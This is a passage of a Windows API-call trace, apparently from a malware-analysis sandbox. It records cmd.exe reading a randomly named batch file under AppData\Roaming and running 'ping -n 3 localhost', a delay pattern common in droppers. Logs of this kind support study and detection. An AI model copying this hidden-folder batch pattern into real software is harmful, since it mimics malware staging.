lpBuffer="$P$G") returned 0x4 [0117.832] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.832] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.832] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.832] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.832] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.832] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.832] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.832] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.832] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.833] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.833] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf8d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.833] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf8d8, lpFilePart=0x1cf8d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf8d4*="Desktop") returned 0x18 [0117.833] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.833] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf654 | out: lpFindFileData=0x1cf654) returned 0x33ffe0 [0117.833] FindClose (in: hFindFile=0x33ffe0 | out: hFindFile=0x33ffe0) returned 1 [0117.833] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf654 | out: lpFindFileData=0x1cf654) returned 0x33ffe0 [0117.833] FindClose (in: hFindFile=0x33ffe0 | out: hFindFile=0x33ffe0) returned 1 [0117.833] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf654 | out: lpFindFileData=0x1cf654) returned 0x33ffe0 [0117.833] FindClose (in: hFindFile=0x33ffe0 | out: hFindFile=0x33ffe0) returned 1 [0117.834] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.834] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.834] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.834] GetEnvironmentStringsW () returned 0x340150* 
[0117.834] FreeEnvironmentStringsW (penv=0x340150) returned 1 [0117.834] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.836] GetConsoleOutputCP () returned 0x1b5 [0117.836] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.836] GetUserDefaultLCID () returned 0x409 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfa18, cchData=128 | out: lpLCData="0") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfa18, cchData=128 | out: lpLCData="0") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfa18, cchData=128 | out: lpLCData="1") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0117.837] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.837] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.838] GetConsoleTitleW (in: lpConsoleTitle=0x3401e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.839] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.839] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0117.839] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0117.839] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0117.842] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", _String2=")") returned 58 [0117.842] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 3 [0117.842] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 3 [0117.842] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 6 [0117.842] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 6 [0117.842] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 15 [0117.842] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd") returned 15 [0117.843] GetConsoleTitleW (in: lpConsoleTitle=0x1cf710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.843] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.843] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf4cc, nVolumeNameSize=0x104, 
lpVolumeSerialNumber=0x1cf4c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf4c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0117.844] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0117.844] SetErrorMode (uMode=0x0) returned 0x0 [0117.844] SetErrorMode (uMode=0x1) returned 0x0 [0117.844] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x34dc08, lpFilePart=0x1cf230 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x1cf230*="vMfCCeRYkvQy") returned 0x2d [0117.844] SetErrorMode (uMode=0x0) returned 0x1 [0117.844] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0117.845] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.849] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0117.849] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", fInfoLevelId=0x1, lpFindFileData=0x1cefcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cefcc) returned 0x3408f0 [0117.849] FindClose (in: hFindFile=0x3408f0 | out: hFindFile=0x3408f0) returned 1 [0117.849] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0117.850] GetConsoleTitleW (in: lpConsoleTitle=0x1cf4a4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.997] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0118.000] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0118.000] IdentifyCodeAuthzLevelW () returned 0x1 [0118.007] 
GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0118.007] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0118.008] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0118.008] CloseCodeAuthzLevel () returned 0x1 [0118.008] SetErrorMode (uMode=0x0) returned 0x0 [0118.008] SetErrorMode (uMode=0x1) returned 0x0 [0118.008] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", nBufferLength=0x104, lpBuffer=0x3404e8, lpFilePart=0x1cf390 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd", lpFilePart=0x1cf390*="p0mhdE5X.cmd") returned 0x3a [0118.008] SetErrorMode (uMode=0x0) returned 0x1 [0118.008] CmdBatNotification () returned 0x0 [0118.008] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0118.008] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0118.008] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.009] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.009] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.009] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.009] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x91, lpOverlapped=0x0) returned 1 [0118.009] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x0) returned 0x15 [0118.009] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0118.010] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.010] GetFileType (hFile=0x58) returned 0x1 [0118.010] _get_osfhandle (_FileHandle=3) returned 0x58 [0118.010] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0118.010] _wcsicmp (_String1="ping", _String2=")") returned 71 [0118.010] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0118.010] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0118.010] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0118.011] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0118.011] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0118.011] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0118.012] _tell (_FileHandle=3) returned 21 [0118.012] _close (_FileHandle=3) returned 0 [0118.012] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf18c | out: _Buffer="\r\n") returned 2 [0118.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.012] GetFileType (hFile=0x7) returned 0x2 [0118.013] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.013] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf14c | out: lpMode=0x1cf14c) returned 1 [0118.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.013] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf178, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf178*=0x2) returned 1 [0118.013] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0118.013] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0118.013] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf188 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0118.013] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1cf188 | out: _Buffer=">") returned 1 [0118.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.013] GetFileType (hFile=0x7) returned 0x2 [0118.014] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf150 | out: lpMode=0x1cf150) returned 1 [0118.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.014] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1cf17c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1cf17c*=0x19) returned 1 [0118.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.014] GetFileType (hFile=0x7) returned 0x2 [0118.014] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3d4 | out: lpMode=0x1cf3d4) returned 1 [0118.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.015] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x340958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x1cf400, lpReserved=0x0 | out: lpBuffer=0x340958*, lpNumberOfCharsWritten=0x1cf400*=0x4) returned 1 [0118.015] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1cf40c | out: _Buffer=" -n 3 localhost ") returned 16 [0118.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.015] GetFileType (hFile=0x7) returned 0x2 [0118.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.015] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3cc | out: lpMode=0x1cf3cc) returned 1 [0118.015] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.015] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1cf3f8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf3f8*=0x10) returned 1 [0118.016] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf42c | out: _Buffer="\r\n") returned 2 [0118.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.016] GetFileType (hFile=0x7) returned 0x2 [0118.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.016] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3ec | out: lpMode=0x1cf3ec) returned 1 [0118.016] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.016] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf418, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf418*=0x2) returned 1 [0118.016] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0118.016] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0118.017] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0118.017] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0118.017] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0118.017] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0118.017] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0118.017] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0118.017] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0118.017] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0118.017] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0118.017] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 
[0118.017] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0118.017] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0118.017] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0118.017] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0118.017] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0118.017] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0118.018] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0118.018] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0118.018] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0118.018] _wcsicmp (_String1="ping", _String2="START") returned -3 [0118.018] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0118.018] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0118.018] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0118.018] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0118.018] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0118.018] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0118.018] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0118.018] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0118.018] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0118.018] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0118.018] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0118.019] SetErrorMode (uMode=0x0) returned 0x0 [0118.019] SetErrorMode (uMode=0x1) returned 0x0 [0118.019] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x350550, lpFilePart=0x1cf1d0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf1d0*="Desktop") returned 0x18 [0118.019] SetErrorMode (uMode=0x0) returned 0x1 [0118.019] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.019] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.019] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0xffffffff [0118.020] GetLastError () returned 0x2 [0118.020] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0xffffffff [0118.020] GetLastError () returned 0x2 [0118.020] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0x350838 [0118.020] FindClose (in: hFindFile=0x350838 | out: hFindFile=0x350838) returned 1 [0118.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0xffffffff [0118.021] GetLastError () returned 0x2 [0118.021] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef4c) returned 0x350838 [0118.021] FindClose (in: 
hFindFile=0x350838 | out: hFindFile=0x350838) returned 1 [0118.021] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.021] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.021] GetConsoleTitleW (in: lpConsoleTitle=0x1cef9c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.022] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.022] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.022] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.022] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0xffffffff [0118.022] GetLastError () returned 0x2 [0118.022] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0xffffffff [0118.022] GetLastError () returned 0x2 [0118.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0x350d80 [0118.023] FindClose (in: hFindFile=0x350d80 | out: hFindFile=0x350d80) returned 1 [0118.023] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0xffffffff [0118.023] GetLastError () returned 0x2 [0118.023] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ce838, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce838) returned 0x350d80 [0118.023] FindClose (in: hFindFile=0x350d80 | out: hFindFile=0x350d80) returned 1 [0118.023] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.023] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.024] GetConsoleTitleW (in: lpConsoleTitle=0x1ced30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.024] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cebb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cec80 | out: lpAttributeList=0x1cebb8, lpSize=0x1cec80) returned 1 [0118.024] UpdateProcThreadAttribute (in: lpAttributeList=0x1cebb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cec78, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cebb8, lpPreviousValue=0x0) returned 1 [0118.024] GetStartupInfoW (in: lpStartupInfo=0x1ceb74 | out: lpStartupInfo=0x1ceb74*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0118.024] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0118.025] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cec14*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, 
cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cec60 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x1cec60*(hProcess=0x54, hThread=0x58, dwProcessId=0xef4, dwThreadId=0xef8)) returned 1 [0118.028] CloseHandle (hObject=0x58) returned 1 [0118.028] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.028] GetEnvironmentStringsW () returned 0x340970* [0118.028] FreeEnvironmentStringsW (penv=0x340970) returned 1 [0118.028] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0126.543] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1ceb54 | out: lpExitCode=0x1ceb54*=0x0) returned 1 [0126.543] CloseHandle (hObject=0x54) returned 1 [0126.543] _vsnwprintf (in: _Buffer=0x1cec9c, _BufferCount=0x13, 